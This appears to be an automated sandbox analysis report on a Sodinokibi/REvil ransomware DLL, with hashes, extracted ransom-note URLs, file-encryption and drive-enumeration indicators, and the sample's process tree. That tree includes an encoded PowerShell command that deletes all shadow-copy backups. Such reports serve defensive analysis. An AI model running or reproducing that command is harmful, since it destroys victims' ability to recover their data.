Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
27-05-2024 07:29
Static task
static1
Behavioral task
behavioral1
Sample
785ba6895dfb23837bba5ef9c84d5c74_JaffaCakes118.dll
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
785ba6895dfb23837bba5ef9c84d5c74_JaffaCakes118.dll
Resource
win10v2004-20240508-en
General
-
Target
785ba6895dfb23837bba5ef9c84d5c74_JaffaCakes118.dll
-
Size
114KB
-
MD5
785ba6895dfb23837bba5ef9c84d5c74
-
SHA1
b78c9d56ffd8775b566daccff497dc2672af8cee
-
SHA256
e8ef7dc54bd782122e3ce1c1ea14c8325dfcd3f6a255d5526c6e2e7624e0f091
-
SHA512
7d5969afd121f8e9fdad129addfd84485744d9b013e2f8d16a7d5df95a864cab818810617b9c09733699df5732aca0f65275b1f0d4fea24439275e189b30f799
-
SSDEEP
1536:6Q2auIslFGhFtuAp75WeNMYLoRGp+K6fHICS4AdfG6NlNmraBXZtT:3sI/hqsMYLoRK7bfxl4rI
Malware Config
Extracted
C:\Recovery\wyj10-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B68B416ED737BF2D
http://decryptor.cc/B68B416ED737BF2D
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\D: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\V: rundll32.exe -
Drops file in Program Files directory 26 IoCs
description ioc Process File opened for modification \??\c:\program files\JoinExpand.mp2 rundll32.exe File opened for modification \??\c:\program files\BlockSet.wmf rundll32.exe File opened for modification \??\c:\program files\CompareSync.sql rundll32.exe File opened for modification \??\c:\program files\FormatCheckpoint.css rundll32.exe File opened for modification \??\c:\program files\GetUnpublish.aifc rundll32.exe File opened for modification \??\c:\program files\DebugSearch.emz rundll32.exe File opened for modification \??\c:\program files\PushDisconnect.easmx rundll32.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\wyj10-readme.txt rundll32.exe File opened for modification \??\c:\program files\UpdateBackup.htm rundll32.exe File opened for modification \??\c:\program files\CompressReceive.pps rundll32.exe File opened for modification \??\c:\program files\GroupRestart.wma rundll32.exe File opened for modification \??\c:\program files\SearchInitialize.otf rundll32.exe File opened for modification \??\c:\program files\SearchSplit.wmv rundll32.exe File opened for modification \??\c:\program files\OutTrace.vst rundll32.exe File opened for modification \??\c:\program files\LimitMove.cr2 rundll32.exe File opened for modification \??\c:\program files\ResetPing.TTS rundll32.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\wyj10-readme.txt rundll32.exe File created \??\c:\program files\wyj10-readme.txt rundll32.exe File created \??\c:\program files (x86)\wyj10-readme.txt rundll32.exe File opened for modification \??\c:\program files\EditSubmit.xhtml rundll32.exe File opened for modification \??\c:\program files\GrantMerge.M2TS rundll32.exe File opened for modification \??\c:\program files\ClearConvertTo.asx rundll32.exe File opened for modification \??\c:\program files\ConvertFromSync.mpg rundll32.exe File opened for modification \??\c:\program files\SelectSync.xlsm rundll32.exe File opened for modification \??\c:\program files\RevokeOpen.odt rundll32.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\wyj10-readme.txt rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1988 rundll32.exe 2636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1988 rundll32.exe Token: SeDebugPrivilege 2636 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2236 wrote to memory of 1988 2236 rundll32.exe 28 PID 2236 wrote to memory of 1988 2236 rundll32.exe 28 PID 2236 wrote to memory of 1988 2236 rundll32.exe 28 PID 2236 wrote to memory of 1988 2236 rundll32.exe 28 PID 2236 wrote to memory of 1988 2236 rundll32.exe 28 PID 2236 wrote to memory of 1988 2236 rundll32.exe 28 PID 2236 wrote to memory of 1988 2236 rundll32.exe 28 PID 1988 wrote to memory of 2636 1988 rundll32.exe 29 PID 1988 wrote to memory of 2636 1988 rundll32.exe 29 PID 1988 wrote to memory of 2636 1988 rundll32.exe 29 PID 1988 wrote to memory of 2636 1988 rundll32.exe 29
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\785ba6895dfb23837bba5ef9c84d5c74_JaffaCakes118.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\785ba6895dfb23837bba5ef9c84d5c74_JaffaCakes118.dll,#12⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2736
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2308
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6KB
MD5b5a9d867a3c956ea7cba5ffa1f12898b
SHA1576ce891fe971944eaae856a005cb46fc34744f6
SHA256be4602cba139575753c069e4dde671a7a58d0d196a130f7ff371c24fd827ebb9
SHA512ea5e43a55a3958dc383848f6bf6b39d4c80acc57a9072f1f67605d7004438b42addf88aebe787f9e704e1024a26996a1e252c1ca6770aa56d5eb4850ebab20d8